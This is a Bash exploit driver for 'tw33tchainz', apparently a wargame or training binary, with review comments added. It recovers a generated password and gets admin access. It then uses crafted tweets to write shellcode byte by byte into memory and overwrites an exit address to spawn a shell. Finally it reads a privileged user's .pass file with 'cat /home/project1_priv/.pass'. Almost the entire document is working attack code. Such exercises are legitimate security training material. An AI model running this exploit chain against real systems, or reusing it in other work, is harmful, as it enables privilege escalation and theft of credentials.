Bash driver to exploit tw33tchainz
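# Files exchanged with the target: "inputs" is streamed into the binary's
# stdin by the tail -f pipeline further down, "debug" mirrors everything sent.
input_file="inputs"
debug_file="debug"
# Start from empty files. -f so a missing file is not an error, -- so the
# names can never be parsed as options.
rm -f -- "$input_file" "$debug_file"
touch -- "$input_file" "$debug_file"
binary="/levels/project1/tw33tchainz"
# Whitespace-separated hex byte values, one word per byte (hand-quoted).
shellCode="/tmp/bleached/project1/binsh.hex"
# Number of bytes = number of words in the file. A missing file yields 0,
# the same value the former `cat | wc -w` produced; stderr is redirected
# before stdin so the redirection failure itself stays silent.
shellCodeSize=$(wc -w 2>/dev/null < "$shellCode" || printf '%s' 0)
# Lines read from the target since the last "5: Exit" menu line. Starts high
# so none of the step-gated actions (which test for 1 or 2) fire before the
# menu has been seen once.
stepsSinceExit=999
# program state constants: distinct tags compared against programState
programState=0
numTweets=0
WAIT=999
GET_PASS=1000
GET_ADMIN=1001
WRITE_SHELL=1002
WRITE_EXIT=1003
# EXIT was referenced below but never assigned; with it unset both sides of the
# comparison expanded to "" and matched only by accident (and `set -u` would
# have aborted). Give it a real tag like the others.
EXIT=1004
writeAddr="0x0804c0c1"
exitAddr="0x0804c038"
# The four bytes of writeAddr in reverse order ("c1 c0 04 08"), one word per
# byte. Plain parameter expansion replaces the former perl byte swap, so no
# extra process and no backslash escaping to get wrong.
writeAddrHex=${writeAddr#0x}
writeAddrValues="${writeAddrHex:6:2} ${writeAddrHex:4:2} ${writeAddrHex:2:2} ${writeAddrHex:0:2}"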
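#######################################
# Append one formatted chunk to the input file (which tail -f feeds into the
# target) and mirror the same bytes into the debug log.
# Globals:   input_file (read), debug_file (read)
# Arguments: $1 - printf format string chosen by the caller (e.g. "%s\n")
#            $2 - optional value substituted into the format
# Outputs:   appends to $input_file and $debug_file
# Returns:   status of the last printf
#######################################
input() {
  local fmt=$1
  local value=${2-}
  # $1 is deliberately the format (callers pass "3\n" with no value), so
  # target-derived text must only ever arrive through $2, never $1.
  printf "$fmt" "$value" >> "$input_file"
  # Was hard-coded as "debug"; use the configured path so the two cannot drift.
  # Everything sent to the target, including the decoded password, lands in
  # this file, so treat it as sensitive.
  printf "$fmt" "$value" >> "$debug_file"
}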
# Main loop. tail -f streams every append to $input_file into the target's
# stdin; each line the target prints is read here and drives a small state
# machine (programState) plus a line counter (stepsSinceExit) that gates when
# the next input is sent.
# NOTE(review): tail -f never exits, so this pipeline only ends when the script
# is killed; `read` without -r interprets backslashes in the target's output,
# and $input_file/$binary are expanded unquoted.
tail -f $input_file | $binary | while read output
do
  # strip ANSI colour/clear escape sequences so the exact-match patterns below see plain text
  output="$(echo "$output" | sed "s,\x1B\[[0-9;]*[a-zA-Z],,g")"
  # echo the cleaned line so the run can be followed on stdout
  echo "$output"
  # Phase 1: act according to the phase we are in.
  case "$programState" in
    $GET_PASS)
      # the line printed right after "Generated Password:" is the generated
      # password; decode_pass.py (not in this file) turns it into the real one.
      # NOTE(review): $genpass is target output expanded unquoted, so a value
      # containing spaces or glob characters would be split/expanded — quote it.
      genpass="$output"
      password="$(python decode_pass.py $genpass)"
      programState=$GET_ADMIN
      ;;
    $GET_ADMIN)
      # one line after the menu: pick option 3 and answer with the password
      # (input also mirrors both lines into the debug file)
      if [ "$stepsSinceExit" == "1" ]
      then
        input "3\n"
        input "%s\n" "$password"
        programState=$WRITE_SHELL
      fi
      ;;
    $WRITE_SHELL)
      # Since we're admin now it's 2 steps away
      if [ "$stepsSinceExit" == "2" ]
      then
        input "1\n"
        # next byte value: the (numTweets+1)-th whitespace-separated word of $shellCode
        hexVal=$(cat $shellCode | cut -d' ' -f$(($numTweets+1)))
        # get_tweet.py (not in this file) is handed the target address, the byte
        # index and the byte value and prints the tweet text
        tweet=$(python get_tweet.py $writeAddr $numTweets $hexVal)
        # NOTE(review): tsize is computed but never read anywhere in the loop
        tsize=$(echo $tweet | wc -c)
        input "%s\n" "$tweet"
        numTweets=$(($numTweets+1))
        # every word of $shellCode sent: switch to the second address and
        # restart the counter. NOTE(review): an empty $shellCodeSize makes this
        # test a syntax error because it is unquoted.
        if [ ! $numTweets -lt $shellCodeSize ]
        then
          programState=$WRITE_EXIT
          numTweets=0
        fi
      fi
      ;;
    $WRITE_EXIT)
      # same pattern as above, but the four values come from writeAddrValues
      # and the address is exitAddr
      if [ "$stepsSinceExit" == "2" ]
      then
        input "1\n"
        hexVal=$(echo $writeAddrValues | cut -d' ' -f$(($numTweets+1)))
        tweet=$(python get_tweet.py $exitAddr $numTweets $hexVal)
        input "%s\n" "$tweet"
        numTweets=$(($numTweets+1))
        if [ ! $numTweets -lt 4 ]
        then
          # NOTE(review): make sure EXIT is assigned alongside the other state
          # constants; if it is unset this stores "" and the `$EXIT)` arm below
          # is an empty pattern that matches only by accident (`set -u` would
          # abort here instead).
          programState=$EXIT
          numTweets=0
        fi
      fi
      ;;
    $EXIT)
      if [ "$stepsSinceExit" == "2" ]
      then
        input "5\n"
        # wait for the shell to fire up
        # NOTE(review): a fixed one-second sleep is a race, not a synchronisation
        sleep 1
        # whatever is reading stdin now receives this line; its output surfaces
        # through the echo at the top of the loop
        input "cat /home/project1_priv/.pass\n"
        # WAIT matches no arm, so from here on the loop only echoes output
        programState=$WAIT
      fi
      ;;
    *)
      # Do nothing
      ;;
  esac
  # Phase 2: react to specific prompts/lines regardless of the phase.
  case "$output" in
    "Enter Username:")
      # 15 bytes of 0x01; note the Python 2 print statement — under python3 the
      # substitution fails and an empty string is sent
      input "%s" "$(python -c "print '\x01'*15")"
      ;;
    "Enter Salt:")
      # 15 bytes of 0xff, same Python 2 caveat
      input "%s" "$(python -c "print '\xff'*15")"
      ;;
    "Generated Password:")
      # the password itself arrives on the next line: arm the state machine and
      # send an empty line
      programState=$GET_PASS
      input "\n"
      ;;
    "5: Exit"*)
      # last menu entry seen: restart the step counter the arms above key on
      stepsSinceExit=0
      ;;
    *)
      # Do nothing
      ;;
  esac
  stepsSinceExit=$(($stepsSinceExit + 1))
done